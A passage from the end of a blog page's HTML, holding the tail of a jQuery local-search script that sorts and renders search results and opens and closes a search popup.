                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
